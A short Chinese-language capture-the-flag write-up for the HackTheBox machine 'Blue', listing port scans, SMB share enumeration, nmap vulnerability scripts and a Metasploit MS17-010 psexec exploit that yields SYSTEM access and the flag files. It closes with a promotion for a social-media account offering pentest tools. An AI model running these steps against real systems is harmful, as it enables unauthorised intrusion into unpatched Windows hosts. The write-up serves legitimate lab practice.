靶机信息

靶机地址:

 https://app.hackthebox.com/machines/Blue

靶场: HackTheBox.com

靶机名称:Blue

难度: 简单

提示信息:

 无

目标: user.txt和root.txt

实验环境

 攻击机:Kali 10.10.16.3
 
 靶机:10.10.10.40

信息收集

扫描端口

扫描靶机开放的服务端口

 sudo masscan -p1-65535 -e tun0  10.10.10.40

 sudo nmap -sC -sV -p 80,88,139,445,389,593,636 10.10.10.175 -oN nmap.log

从扫描结果中看到靶机系统为Windows7 7601，对445端口进行检测

SMB服务渗透

 smbclient -N -L 10.10.10.40

发现共享目录

 smbmap -H 10.10.10.40 -u "0xdf" -p "0xdf"

发现Share与Users两个目录可读，收集敏感信息

 smbclient //10.10.10.40/Share

Share目录为空，再来看看Users目录

smbclient //10.10.10.40/Users

Users共享目录下面有两个文件夹，但未找到敏感信息

nmap扫描脚本漏洞

sudo nmap --script smb-vuln* 10.10.10.40 -p 445 -oN nmap-smb-vuln.log

又是MS17-010，开启msf攻击

msfocnsole
search ms17-010
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 10.10.10.40
set LHOST 10.10.16.3
run

攻击成功，拿到SYSTEM权限

cd C:\Users
dir
type haris\desktop\user.txt
type administrator\desktop\root.txt

拿到root.txt，游戏结束

欢 迎 加 入 星 球 ！

关 注 有 礼

关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

 还在等什么？赶紧点击下方名片关注学习吧！